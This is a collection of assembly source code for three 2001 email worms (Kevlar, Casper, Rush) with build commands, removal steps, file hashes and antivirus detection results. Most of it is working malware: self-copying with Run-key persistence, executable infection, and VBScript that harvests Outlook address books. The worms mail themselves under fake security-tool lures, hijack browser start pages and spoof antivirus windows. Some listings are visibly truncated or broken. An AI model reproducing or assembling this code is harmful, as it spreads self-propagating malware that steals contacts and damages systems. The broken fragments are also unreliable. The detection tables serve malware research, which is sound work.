SHA1..: 5b1aac1f8783d4123f3b88c213bc8321dc8d6a4a
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Kevlar
Author : PetiK
Date : August 7th - August 16th
Language : ASM
Size : 5120 byte
Action : Copy itself to %System%\Kevlar32.exe hidden attribute
%System%\MScfg32.exe normal attribute
Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System
%\Kevlar32.exe
* Infect %Windir%\C???????.exe file on writing as "PetiK" in the file

* Infect %Windir%\*.exe It add .htm and create a new file with ActiveX
* Create C:\__.vbs This file takes all address in the Address Book at save them in
the %windir%\AddBook.txt. The worm scan this file to find the address and send a new mail
:
Subject : Windows Protect !!

Body : The smallest software to stop your computer to bug in each time.
I have found this program on WWW.KEVLAR-PROTECT.COM
Take a look at the attchment.
Bye and have a nice day.
Attachment : MScfg32.exe
* It creates the %windir%\MSinfo32.txt. I look like this :
[File Infected] => Name of C???????.exe file infected

CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK
[EMail saved] => Some address found in the address book

first@mail.com=Next victim
second@mail.com=Next victim
To build the worm:

tasm32 /M /ML Kevlar
tlink32 -Tpe -aa -x Kevlar,,,import32
upx -9 Kevlar.exe
To delete the worm:

@echo off
del %windir%\system\Kevlar32.exe
del %windir%\system\MScfg32.exe
del %windir%\*.exe.htm
del %windir%\MSinfo32.txt
del %windir%\AddBook.txt
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
F_NAME: push 50
mov esi,offset Orig
push esi
push 0
mov edi,offset CopyName2

push edi
push 50
push edi
add edi,eax
mov eax,'cSM\'
stosd
mov eax,'23gf'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
mov edi,offset CopyName

push edi
push 50
push edi
add edi,eax
mov al,'\'
stosb
mov eax,'lveK'
stosd
mov eax,'23ra'
stosd
mov eax,'exe.'
stosd
pop edi
push esi
cmp eax,1
je SUITE
push 0
push edi
push esi
callx CopyFileA
push 01h
push edi
callx SetFileAttributesA
REG: pushad
@pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov edi,eax
push edi
test eax,eax
jz FIN
mov esi,eax
push 08h
push offset CopyName
push 01h
@pushsz "Kevlar32"
@pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
call esi
push edi
callx FreeLibrary
popad
call Nick
mov edi,offset nickname
push 40h
@pushsz "Hello, my name is :"
push edi
push 0
callx MessageBoxA
call Infect
jmp FIN
SUITE: call Infect2

VB_F: pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\__.vbs"
callx CreateFileA
test eax,eax
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\__.vbs"
callx WinExec
push 10000
callx Sleep
@pushsz "C:\__.vbs"
callx DeleteFileA
SCAN1: mov edi,offset addbook

push edi
push 50
push edi
add edi,eax
mov eax,"ddA\"
stosd
mov eax,"kooB"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call OPEN
FIN: push 00h

callx ExitProcess
Nick Proc
mov edi,offset nickname
callx GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
name_g:
push ecx
callx GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
callx GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
callx Sleep
pop ecx
loop name_g
ret
Nick EndP
Infect Proc
pushad
push 50
push offset WinPath
push offset WinPath
FFF:
push offset Search
@pushsz "C???????.exe"
inc eax
je F_INF
dec eax
mov [exeHdl],eax
I_FILE:
mov verif,0
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
callx CreateFileA
inc eax
jz FNF
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push ebx
test eax,eax
jz CL1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 06h
push ebp
callx MapViewOfFile
test eax,eax
jz CL2
xchg eax,edi
mov esi,eax
cmp word ptr [esi],"ZM"
jne CL2
cmp byte ptr [esi+18h],"@"
jne CL2
cmp word ptr [esi+80h],"EP"
jne CL2
cmp byte ptr [esi+12h],"P"
je CL2
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
inc verif
push edi
CL2:
push ebp
callx CloseHandle
CL1:
push ebx
callx CloseHandle
cmp verif,1
jne FNF
mov edi,offset InfoFile
push edi
push 50
push edi
add edi,eax
mov eax,'iSM\'
stosd
mov eax,'3ofn'
stosd
mov eax,'xt.2'
stosd
mov al,'t'
stosb
pop edi
mov esi,edi
push esi
@pushsz "Infected by W32.Kevlar.PetiK"
@pushsz "File Infected"
FNF:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE
FC:
push [exeHdl]
callx FindClose
F_INF:
popad
ret
Infect EndP
Infect2 Proc
pushad
push 50
push offset WinPath
push offset WinPath
FFF2:
push offset Search
@pushsz "*.exe"
inc eax
je F_INF2
dec eax
mov [exeHdl],eax
I_FILE2:
pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
callx CreateFileA
test eax,eax
xchg ebp,eax
push 00h
push offset octets
push HTMSIZE
push offset htmd
push ebp
callx WriteFile
push ebp
callx CloseHandle
popad
FNF2:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE2
FC2:
push [exeHdl]
callx FindClose
F_INF2:
popad
ret
Infect2 EndP
OPEN: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset addbook
callx CreateFileA
inc eax
je NO
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3 ; is the file empty ??
call SCAN
F3: push esi

F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
NO: popad
ret
SCAN:
pushad
xor edx,edx
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"!"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je SCAN
call SEND_MAIL
jmp SCAN
entr2: xor al,al
stosb
pop edi
jmp SCAN
f_mail: popad
ret
SEND_MAIL:
push 50
push offset save_addr
@pushsz "\MSinfo32.txt"
callx lstrcat
@pushsz "Next victim"
push offset m_addr
@pushsz "EMail saved"
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== INSTALLATION =====
Orig db 50 dup (0)
CopyName db 50 dup (0)
CopyName2 db 50 dup (0)
nickname db 11 dup (?)
; ===== INFECTION =====
InfoFile db 50 dup (0)
WinPath db 50 dup (0)
exeHdl dd ?
verif dd ?
octets dd ?
; ===== MAIL =====

addbook db 50 dup (0)
save_addr db 50 dup (0)
MAPIHdl dd 0
subject db "Windows Protect !!",00h
body db "The smallest software to stop your computer to bug in each time.",0dh,0ah
db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah
db "Take a look at the attchment.",0dh,0ah,0dh,0ah
db 09h,09h,"Bye and have a nice day.",00h
NameFrom db "Your friend",00h
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd NameFrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset CopyName2
dd ?
dd ?
htmd:
db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
db '<script language=vbscript>',0dh,0ah
db 'on error resume next',0dh,0ah
db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
db 'If err.number=429 then',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
db 'You need ActiveX enabled to see this file<br><a
href=''javascript:location.reload()''>'
db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
db 'Else',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'document.write "<font face=''verdana'' size=''3'' color=red>'
db 'This page is generate by a worm<br>But this worm is proteced by
Kevlar<br></font>"',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
db 'Worms are not dangerous for your computer but to survive, they must be
strong</font>"',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.avp.ch"',0dh,0ah
db 'End If',0dh,0ah
db '</script></html>',00h
HTMSIZE = $-htmd
vbsd:
db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine "!"',0dh,0ah
VBSSIZE = $-vbsd
signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h
MAX_PATH equ 260

FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
db 3 dup (?)
end DEBUT
end
File Kevlar.exe received on 05.16.2009 17:43:00 (CET)
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Kev
Authentium 5.1.2.4 2009.05.16 W32/Malware!c6f1
Avast 4.8.1335.0 2009.05.15 Win32:Kevlar
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.H
BitDefender 7.2 2009.05.16 Generic.Malware.GSMsp!.411C2399
CAT-QuickHeal 10.00 2009.05.15 W32.Petik
ClamAV 0.94.1 2009.05.16 Win32.Pet_Tick.M
Comodo 1157 2009.05.08 Worm.Win32.Petik.L
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eTrust-Vet 31.6.6508 2009.05.16 Win32/Kevlar
F-Prot 4.4.4.56 2009.05.16 W32/Malware!c6f1
Fortinet 3.117.0.0 2009.05.16 JS/KEVLAR.A
GData 19 2009.05.16 Generic.Malware.GSMsp!.411C2399
McAfee+Artemis 5616 2009.05.15 Artemis!95EC22B0B688
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Kev
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.M@mm
NOD32 4080 2009.05.15 Win32/Petik.L
Norman 6.01.05 2009.05.16 W32/Pet_Tick.5120
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.C
PCTools 4.4.2.0 2009.05.16 I-Worm.Petik.I1
Rising 21.29.52.00 2009.05.16 Trojan.Petik
Sophos 4.41.0 2009.05.16 W32/Kevlar
Symantec 1.4.4.12 2009.05.16 W32.Pet_Tick.M
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.M
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik.5120
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petik.I1
MD5...: 95ec22b0b68815a9bf6def95e5c3b9b1
SHA1..: 00dbadea4b400e6e0ae58951d063a4943fd1fc8d
comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size : 6144 byte (compressed with UPX tool)
Action : Copy itself to

* WINDOWS\MsWinsock32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Winsock32 1.0 = WINDOWS\MsWinsock32.exe
To build the worm:

tasm32 /ml /m9 Casper
tlink32 -Tpe -c -x -aa Casper,,,import32,dllz
upx -9 Casper.exe
To delete the worm:

del %windir%\MsWinsock32.exe
del %windir%\CasperEMail.txt
dllz.def file:
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
Main_Worm:
call Hide_Worm
call Copy_Worm
call Check_Wsock
call Prepare_Spread_Worm
Connected_:
push 00h
push offset Tmp
callx InternetGetConnectedState
dec eax
jnz Connected_
mov edi,offset casper_mail
push edi
push 50
push edi
add edi,eax
mov eax,"saC\"
stosd
mov eax,"Erep"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call Spread_Worm
Hide_Worm proc
pushad
@pushsz "Kernel32.dll"
xchg eax,ecx
jecxz End_Hide
push ecx
xchg eax,ecx
jecxz End_Hide
push 1
push 0
call ecx
End_Hide:
popad
ret
Hide_Worm endp
Check_Wsock proc
Search_Wsock:
push 50
mov edi,offset wsock_file
push edi
add edi,eax
mov eax,"osW\"
stosd
mov eax,"23kc"
stosd
mov eax,"lld."
stosd
xor eax,eax
stosd
push offset wsock_file

cmp eax,20h
jne End_Wsock
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset wsock_file
callx CreateFileA
mov wsckhdl,eax
File_Mapping:
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push wsckhdl
test eax,eax
jz Close_File
mov wsckmap,eax
xor eax,eax
push eax
push eax
push eax
push 06h
push wsckmap
callx MapViewOfFile
test eax,eax
jz Close_Map_File
mov esi,eax
mov wsckview,eax
Old_Infect:
mov verif,0
cmp word ptr [esi],"ZM"
jne UnmapView_File
cmp byte ptr [esi+12h],"z"
je Infected_By_Happy
cmp word ptr [esi+38h],"ll"
je Infected_By_Icecubes
jmp UnmapView_File
Infected_By_Happy:
push 10h
push offset warning
@pushsz "I-Worm.Happy coded by Spanska"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Infected_By_Icecubes:
push 10h
push offset warning
@pushsz "I-Worm.Icecubes coded by f0re"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Already_Infected:
inc verif
jmp UnmapViewOfFile
UnmapView_File:
push wsckview
Close_Map_File:
push offset wsckmap
callx CloseHandle
Close_File:
push wsckhdl
callx CloseHandle
End_Wsock:
ret
Check_Wsock endp
Copy_Worm proc
pushad
Original_Name:
push 50
mov esi,offset original
push esi
push 0
Copy_Name:
mov edi,offset copy_name
push edi
push 50
push edi
add edi,eax
mov eax,'WsM\'
stosd
mov eax,'osni'
stosd
mov eax,'23kc'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
Reg_Registered:
push 08h
push edi
push 01h
@pushsz "Winsock32"
push 80000002h
callx SHSetValueA
push 08h
@pushsz "PetiK - France - (c)2001"
push 01h
@pushsz "Author"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
push 08h
@pushsz "1.00"
push 01h
@pushsz "Version"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
popad
ret
Copy_Worm endp
Prepare_Spread_Worm proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\CasperMail.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
push 1
@pushsz "wscript C:\CasperMail.vbs"
callx WinExec
push 3 * 1000
callx Sleep
@pushsz "C:\CasperMail.vbs"
callx DeleteFileA
popad
ret
Prepare_Spread_Worm endp
Spread_Worm:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset casper_mail
callx CreateFileA
inc eax
test eax,eax
je End_Spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3
call Scan_Mail
F3: push esi

F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
End_Spread_worm:
popad
ret
Scan_Mail:
pushad
xor edx,edx
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je Scan_Mail
call Send_Mail
jmp Scan_Mail
entr2: xor al,al
stosb
pop edi
jmp Scan_Mail
f_mail:
FIN: push 00h
callx ExitProcess
Send_Mail:
xor eax,eax
push eax
push eax
push eax
push offset Message
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== Main_Worm =====
wsock_file db 50 dup (0)
; ===== Check_Wsock =====
wsckhdl dd 0
wsckmap dd 0
wsckview dd 0
PEHeader dd 0
warning db "Warning : You're infected by",00h
verif dd ?
; ===== Copy_Worm =====

original db 50 dup (0)
copy_name db 50 dup (0)
; ===== Prepare_Spread_Worm =====
octets dd ?
; ===== Spread_Worm =====
casper_mail db 50 dup (0)
mail_name db "Casper_Tool.exe",00h
MAPIHdl dd 0
Tmp dd 0
subject db "Casper Tool Protect 1.00",00h

body db "Hi,",0dh,0ah
db "Look at this attachment...",0dh,0ah
db "This freeware alert you if you infected by "
db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah
db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah
db "The tool Casper v.1.00 scans this specific file and displays a message "
db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"Good Bye and have a nice day",00h
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset original
dd offset mail_name
dd ?
vbsd:
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah
VBSSIZE = $-vbsd
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
db 3 dup (?)
end DEBUT
end
File Casper.exe received on 05.16.2009 11:21:10 (CET)

AntiVir 7.9.0.168 2009.05.15 Worm/Casper
Avast 4.8.1335.0 2009.05.15 Win32:Trojan-gen {Other}
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.G
BitDefender 7.2 2009.05.16 Win32.Petik.E@mm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.J
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.6144!intended
F-Prot 4.4.4.56 2009.05.15 W32/Malware!791a
Fortinet 3.117.0.0 2009.05.16 W32/PetTick@mm
GData 19 2009.05.16 Win32.Petik.E@mm
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Casper
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.K@mm
NOD32 4080 2009.05.15 Win32/Petik.J
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 W32/Casper
PCTools 4.4.2.0 2009.05.15 I-Worm.Petik.K1
Prevx 3.0 2009.05.16 High Risk Cloaked Malware
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 W32/Petik-I
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.R
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petik.K1
MD5...: 87e2b361908ac17e03ae947c75a140a2
SHA1..: f038e389ea778594125222e97d82a0a2c1404986
comment #
Name : I-Worm.Rush
Author : PetiK
Date : August 27th - September 2nd
Size : 5632 byte (compiled with UPX tool)

* WINDOWS\SYSTEM\Mail32.exe
* Mail Outlook = WINDOWS\SYSTEM\Mail32.exe
* On Wednesday it opens the cdrom

* The 3rd it produces a sound
* the 15th it alters "Search Page", "Start Page", and "Local Page" by
* Creates %personal%\Read_Me.txt with a text
* A vbs file search all email in the Oultook software and put them in the
Mailbook.txt.
The worm scans the file to find email.
Subject : New Scan Virus...
Body : Hi man,
I send you the last update of ScanVir (v 2.5).
Look at the file attached.
Bye and have a nice day.
Attached : ScanVir_25.exe
* Scans title of windows :
- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
- System Properties => Minimize the window
To build the worm:

@echo off
tasm32 /ml /m9 Rush
tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
upx -9 Rush.exe
if exist *.obj del *.obj
if exist *.map del *.map
To delete the worm:

del %windir%\system\Mail32.exe
del %personal%\Read_Me.txt
del %windir%\MailBook.txt
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
;call hide_worm
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
mov edi,offset copy_worm

push edi
push 50
push edi
add edi,eax
mov eax,"iaM\"
stosd
mov eax,".23l"
stosd
mov eax,"exe"
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
push 8
push edi
push 1
@pushsz "Mail Outlook"
push 80000002h
callx SHSetValueA
check_date:
push offset SystemTime
callx GetSystemTime
jne beep1
cdrom_open:
push 00h
push 00h
push 00h
@pushsz "open cdaudio"
callx mciSendStringA
push 00h
push 00h
push 00h
@pushsz "set cdaudio door open"
callx mciSendStringA
beep1: push offset SystemTime

callx GetSystemTime
jne special_folder
mov counter,0
beep2: inc counter
push 30h
callx MessageBeep
push 1
callx Sleep
cmp counter,5000
jne beep2
special_folder:
push 00h
push 05h
push offset personal
push 00h
callx SHGetSpecialFolderPathA
@pushsz "\Read_Me.txt"
callx lstrcat
txt_file:
push 00h
push 01h
push 02h
push 00h
push 01h
push 40000000h
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push TXTSIZE
push offset txtd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\rushhour.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\rushhour.vbs"
callx WinExec
push 2000
callx Sleep
@pushsz "C:\rushhour.vbs"
callx DeleteFileA

callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne start_scan
call internet_page
start_scan:
mov edi,offset mailbook
push edi
push 50
push edi
add edi,eax
mov eax,"iaM\"
stosd
mov eax,"ooBl"
stosd
mov eax,"xt.k"
stosd
mov ax,"t"
stosd
xor eax,eax
stosd
open_scan_file:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset mailbook
callx CreateFileA
inc eax
je not_exist
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe F3
scan_file:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_file
call send_mail
jmp scan_file
entr2: xor al,al
stosb
pop edi
jmp scan_file
f_mail:
F3: push esi

F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
not_exist:
popad
scan_window:mov counter,0
win1: inc counter
cmp counter,1000000
je end_w
@pushsz "Norton AntiVirus"
push 00h
callx FindWindowA
test eax,eax
jz win2
jmp change_nav
win2: @pushsz "System Properties"
push 00h
callx FindWindowA
test eax,eax
jz win3
jmp show_window
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
push 00h
callx FindWindowA
test eax,eax
jz win1
jmp display_message
change_nav:
mov edi,eax
@pushsz "Norton Virus : W32.Norton.Worm@mm"
push edi
callx SetWindowTextA
jmp win1
show_window:
mov edi,eax
push 2
push edi
callx ShowWindow
jmp win1
display_message:
mov edi,eax
push 10h
@pushsz "Microsoft Internet Explorer"
@pushsz "You don't have access to this page"
push 00h
callx MessageBoxA
push 0
push edi
callx ShowWindow
jmp win1
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
xchg eax,ecx
jecxz end_hide_worm
push ecx
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
internet_page:
pushad
call diff_val
db "Search Page",0
db "Start Page",0
db "Local Page",0
diff_val:
pop esi
push 3
pop ecx
page_loop:
push ecx
push 32
@pushsz "http://www.petik.fr.fm"
push 1
push esi
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop page_loop
popad
ret
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
; === beep ===

counter dd ?
; === special_folder ===

personal db 70 dup (0)
octets dd ?
FileHdl dd ?
; === scan email ===

mailbook db 50 dup (0)
mail_addr db 128 dup (?)
MAPIHdl dd 0
name_mail db "ScanVir_25.exe",0
subject db "New Scan Virus...",0

body db "Hi man,",0dh,0ah
db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
db "Look at the file attached.",0dh,0ah,0dh,0ah
db 09h,09h,09h,09h,"Bye and have a nice day.",0
namefrom db "Your Best Friend",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd namefrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
txtd: db "Hi man,",0dh,0ah,0dh,0ah

db "I don't want to destroy your computer.",0dh,0ah
db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"PetiK",00h
TXTSIZE equ $-txtd
vbsd: db 'On Error Resume Next',0dh,0ah

db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set
txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set
txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
VBSSIZE equ $-vbsd
signature db "I-Worm.Rush",00h
origine db "A worm made in France",00h
author db "Written by PetiK - 2001",00h
end start
end
File Rush.exe received on 05.16.2009 19:29:11 (CET)

AhnLab-V3 5.0.0.2 2009.05.16 Win32/Petik.worm
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.H1
Authentium 5.1.2.4 2009.05.16 W32/Malware!92e7
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Rush
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.L
BitDefender 7.2 2009.05.16 Generic.Malware.SMsp!g.42345E6D
ClamAV 0.94.1 2009.05.16 Worm.Petik
